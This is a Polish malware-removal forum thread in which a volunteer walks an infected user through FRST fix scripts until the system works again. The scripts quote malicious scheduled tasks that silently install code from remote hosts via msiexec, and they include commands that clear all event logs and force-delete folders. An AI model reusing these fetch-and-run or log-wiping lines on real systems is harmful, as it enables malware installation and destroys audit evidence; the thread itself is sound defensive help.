Zainfekowany system - wymuszony restart, wirusy

glizzz · 14 Grudnia 2018

Witam!

Mój problem dotyczy zainfekowanego systemu. Wczoraj ściągnąłem program, który okazał się być wirusem i niestety nic nie działa. System się zawiesza przy próbie pobrania jakiegokolwiek programu, nie mogę dostać się do trybu awaryjnego, skanowanie GMER nie może zostać ukończone ze względu na błędy systemowe wywalające po drodze i wymuszony przy okazji restart. Przeglądarka muli, zawiesza się. Proszę o sprawdzenie poniższych logów, to jedyne jakie udało mi się uzyskać.

Z góry dziękuję za pomoc!

http://wklejto.pl/672301 - raport adwcleaner

http://wklejto.pl/672303 - raport malwarebytes antimalware

http://www.wklejto.pl/672305 - log FRST

http://www.wklejto.pl/672306 - Shortcut (FRST)

http://www.wklejto.pl/672308 - Addition (FRST)

PS. Malwarebytes AntiMalware blokuje mi połączenia wychodzące z tego adresu: C:\Windows\SysWOW64\InstallShield

filutka78 · 14 Grudnia 2018

Log FRST.txt nie jest cały.

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Task: {5D820224-4E32-4A90-9637-3D1ABA09B735} - System32\Tasks\{FDBDA568-CBB1-8B2A-0810-01EBBC697297} => "msiexec" -i hxxps://refreshnerer711.info/6Tu70hwu.0I1 -q
Task: {FFEC41AB-2770-4055-AC2A-C096F14DB794} - System32\Tasks\{A7038579-2C15-4C08-FE1F-616D7F4A4F38} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/4IpxoJ17o.b9P /q
FirewallRules: [{FAC36ADC-A32B-4F16-8BDE-E6C5B4F9D06D}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{7387D3FF-8FDC-45DE-AC58-690F27B0FB4B}] => (Allow) C:\Users\Wojtek\AppData\Local\OPMCeagoudrha.exe
FirewallRules: [{B680A0D5-28A9-4F1C-BF97-05C4467561E4}] => (Allow) C:\Users\Wojtek\AppData\Local\XoKADmI.exe
FirewallRules: [{4AFD6F51-150B-48BF-B440-D9B967C963E2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9F2B9B97-F67F-42BF-8A95-586ECB1E1B7F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{32CE51A3-E1C5-425B-8D7B-5D68BDB5155F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E01C922E-E20E-445D-8626-A357E140EDA0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{46B856AF-3795-4A75-A51F-9AA790712154}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6CF0F480-7655-4E06-BE0A-D0E6CDBA1239}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
C:\Users\Wojtek\AppData\Local\OPMCeagoudrha.exe
C:\Users\Wojtek\AppData\Local\XoKADmI.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
InternetURL: C:\Users\Wojtek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BznMMQqmAG.url ->
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
BHO: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku
BHO-x32: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku
S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [X]
C:\Users\Wojtek\AppData\Local\wbem.ini
RemoveDirectory: C:\ProgramData\5POK96X56DS2GH85R5XB
CMD: attrib /d /s -r -s -h C:\FOUND.*
CMD: for /d %f in (C:\FOUND.*) do rd /s /q "%f"
C:\Users\Wojtek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BznMMQqmAG.url
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Jeśli problem nie zniknie, to zrobisz nowe logi FRST.

F.

glizzz · 14 Grudnia 2018

Nie mogę tego wkleić, program od razu się wiesza:(

filutka78 · 14 Grudnia 2018

Zmień nazwę FRST.exe, na jakąś inną, np. fantom.exe

glizzz · 14 Grudnia 2018

Udało się w trybie awaryjnym. Poniżej log z usuwania i nowy log FRST.

FixLog: http://www.wklejto.pl/672429

Nowy FRST: http://www.wklejto.pl/672437

addition: http://www.wklejto.pl/672440

shortcut: http://www.wklejto.pl/672441

filutka78 · 14 Grudnia 2018

Log FRST.txt nie jest cały.

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

FirewallRules: [{E4004543-16F3-4249-8FA0-79F541BFFCD7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FC4E5734-3C73-4AF1-B535-980940EC2C9F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{90CD0393-6503-4D1C-978F-A00F8DD86B33}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{9B1AFC7B-3B38-4A32-9C67-44346777FEB1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F0EC2561-BA53-4D66-B942-7189BFDD51E2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B94169FB-2A57-4D27-ABA8-1D86821A5206}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E7C3A3F1-8062-4FF5-B2EE-A34AA43D237A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{95527B99-99F1-47CB-A22B-59AC065B2083}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{51411726-F074-4542-91D2-05DB7EAE60C3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7632CE70-F3A4-4095-8B4B-D21D44EF9D7A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2BF61385-1B29-4C25-A738-229A97721F96}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{919493A9-273D-4A20-B0F6-51BF9E2FD026}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8FE6EC83-18EF-42D6-BB75-3A6349E6CC4E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A9D2F4C1-6E27-4C16-915C-2BB3BCDE073D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A0719B58-1DC1-4314-A267-07607FA60A0C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D6DB16D1-1F46-434E-BD1C-3E7E0B53D31F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{82B6B2AE-C5C9-48C3-ACB6-B1A8750BDED6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{85BDCDD7-375C-4625-8B61-E153A3750C6E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
Task: {A448B9E0-A236-4D1F-B260-78237ECA772C} - \FreeDownloadManagerNetworkMonitor -> Brak pliku <==== UWAGA
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

F.

glizzz · 14 Grudnia 2018

FixLog: http://www.wklejto.pl/672616

Nowy FRST: https://paste.systemli.org/?714d77dabc334aec#35tNIi4VnZZAN33BS54Zhhv29iw0ZCRVr7HxdbKNXlM=

filutka78 · 14 Grudnia 2018

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

C:\ProgramData\pnlwud.exe
C:\ProgramData\zVmiMcGqez
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Napisz, jak oceniasz sytuację po tych usuwaniach?

F.

glizzz · 15 Grudnia 2018

Jest DUŻO lepiej, system działa normalnie - tak jak przed infekcją. Dziękuję Ci bardzo, jesteś SUPER!

Temat został przeniesiony do archiwum

Zainfekowany system - wymuszony restart, wirusy

Rekomendowane odpowiedzi

glizzz 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

glizzz 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

glizzz 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

glizzz 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

glizzz 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

Ostatnio przeglądający 0 użytkowników

Tematy

Odpowiedzi

Aktywni użytkownicy

Przeglądaj

Aktywność